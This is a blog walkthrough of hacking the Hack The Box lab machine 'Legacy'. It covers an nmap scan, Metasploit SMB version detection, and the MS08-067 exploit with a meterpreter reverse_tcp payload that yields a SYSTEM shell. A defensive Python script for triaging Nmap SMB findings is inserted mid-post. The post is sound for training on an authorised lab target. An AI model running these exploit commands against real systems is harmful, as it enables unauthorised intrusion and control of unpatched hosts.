What the hec... no... Hack The Box?
If you have always wanted to break boxes but don't have a clue where to start, Hack The Box may be The Service(tm) for your weird tastes. And that's why I subscribed there. :)
It's basically a service that offers virtual machines of various difficulty levels for you to hack. The easiest ones are really easy, and the insane ones at the other end of the scale are exactly that.
You can choose between free and paid plans. The biggest differences are that only the paid plan also gives access to the retired machines, and its virtual machines have more resources available.
You are also not allowed to publish howtos or walkthroughs for the active machines. So if you want to learn faster(?) or more, you probably want the paid plan at least for the first few moons, because then you can get help when you get stuck.
Yes, there are also other resources available but you can read more from their website.
But now I want to show what it actually means to break into a machine. There are many ways to do this, but this is one method.
I'm using the Windows machine Legacy as an example, and this machine has difficulty level easy.
I have the VPN connection to the HTB infra up, and the box responds to ping:
root@kali:~# ping 10.10.10.4
PING 10.10.10.4 (10.10.10.4) 56(84) bytes of data.
64 bytes from 10.10.10.4: icmp_seq=1 ttl=127 time=45.1 ms
64 bytes from 10.10.10.4: icmp_seq=2 ttl=127 time=44.9 ms
^C
--- 10.10.10.4 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 44.949/45.048/45.147/0.099 ms
First I'll do an Nmap scan to find out which ports are open on this machine. I'm not going to describe every command in detail, but this Nmap command scans all the ports and tries to find all the information it can from the ports it finds open. I'm using red color to highlight the important stuff.
root@kali:~# nmap -A -T4 -p- 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-13 13:54 EDT
Nmap scan report for 10.10.10.4
Host is up (0.045s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%), Microsoft Windows XP SP2 or SP3 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h27m39s, deviation: 2h07m16s, median: 4d22h57m39s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:2e:aa (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-07-18T22:54:14+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 48.00 ms 10.10.14.1
2 48.09 ms 10.10.10.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.50 seconds
So, the hostname of this machine is LEGACY and ports 139 and 445 are open, which means that there is most probably a Windows file share (SMB) available. Since no other ports are open, we can also expect that this is the way into the box.
For the actual hard work I'm using Metasploit, because it helps to demonstrate how these things work. Metasploit has its pros and cons, but it's a heavily used framework, and it offers an awful lot of readily implemented scanners and exploits.
First we need to find out which Windows version the file share is actually running on.
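Reading a scan like the one above by hand is fine for one box, but on a real network you want the same triage automated: which hosts expose SMB, whether message signing is disabled, and whether the fingerprinted OS is out of support. The script below is an added example (not part of the original post) that parses an abridged, constructed copy of the Nmap output above and returns those findings; the `UNSUPPORTED` list is an assumption for illustration.

```python
import re

# Constructed sample: an abridged copy of the Nmap report above.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.4
Host is up (0.045s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# Matches a row of Nmap's PORT table: "445/tcp open microsoft-ds Windows XP microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
# Assumed list of OS families that no longer receive security updates.
UNSUPPORTED = ("Windows XP", "Windows 2000", "Windows Server 2003")


def parse_ports(report):
    """Return {port: (state, service, version)} from the PORT table."""
    ports = {}
    for line in report.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports[int(m.group(1))] = (m.group(3), m.group(4), m.group(5) or "")
    return ports


def smb_findings(report):
    """Triage SMB exposure: open SMB ports, signing state, end-of-life OS."""
    ports = parse_ports(report)
    open_smb = [p for p in (139, 445) if ports.get(p, ("",))[0] == "open"]
    sig = re.search(r"message_signing:\s*(\w+)", report)
    os_line = re.search(r"^\|\s*OS:\s*(.+)$", report, re.M)
    os_name = os_line.group(1).strip() if os_line else ""
    findings = []
    if open_smb:
        findings.append(f"SMB exposed on {open_smb}")
    if sig and sig.group(1) == "disabled":
        findings.append("SMB signing disabled")
    if any(os_name.startswith(u) for u in UNSUPPORTED):
        findings.append(f"end-of-life OS: {os_name}")
    return findings
```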
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) > options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_version) > run
[+] 10.10.10.4:445 - Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
[*] 10.10.10.4:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
So, it's Windows XP SP3, and the next step is to ask Google how we should proceed. The first link sounds really promising, because it's from Rapid7, the company behind Metasploit. This should be quite a simple machine to break into, because there is a module available in Metasploit to exploit this particular vulnerability.
msf5 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost tun0
lhost => tun0
msf5 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.4 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Now the exploit has been configured, and we can run the exploit.
msf5 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 10.10.14.26:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.26:4444 -> 10.10.10.4:1057) at 2020-07-13 14:11:08 -0400
So, we are now in! The exploit worked, it was able to open a shell connection to the machine, and we can continue.
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Holy cow! We are in as NT AUTHORITY\SYSTEM, which by default is the account with the highest permissions on Windows computers. So, we have access to everything on this machine.
meterpreter > shell
Process 1780 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
16/03/2017 08:30 0 AUTOEXEC.BAT
16/03/2017 08:30 0 CONFIG.SYS
16/03/2017 09:07 <DIR> Documents and Settings
29/12/2017 11:41 <DIR> Program Files
18/07/2020 07:10 <DIR> WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.400.892.928 bytes free
C:\>echo jee > jee.txt
echo jee > jee.txt
C:\>del autoexec.bat
del autoexec.bat
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
16/03/2017 08:30 0 CONFIG.SYS
16/03/2017 09:07 <DIR> Documents and Settings
18/07/2020 11:12 6 jee.txt
29/12/2017 11:41 <DIR> Program Files
18/07/2020 07:10 <DIR> WINDOWS
2 File(s) 6 bytes
3 Dir(s) 6.400.864.256 bytes free
C:\>type jee.txt
type jee.txt
jee
And that's it. There isn't anything else to show. Of course, in the real world things are rarely as easy as with this machine, and since this was a demonstration you might assume (correctly) that at least some dead ends and wrong turns have been skipped. Although this was quite an easy one, so it didn't require many *head to wall* moves.
I might post some more examples and even walkthroughs in the future, who knows, so please stay tuned!
PS. There is a really good reason why you should keep your computer stuff updated... And the reason is that these remote code execution (RCE) type vulnerabilities are patched quite quickly, and this wouldn't work with newer Windows versions.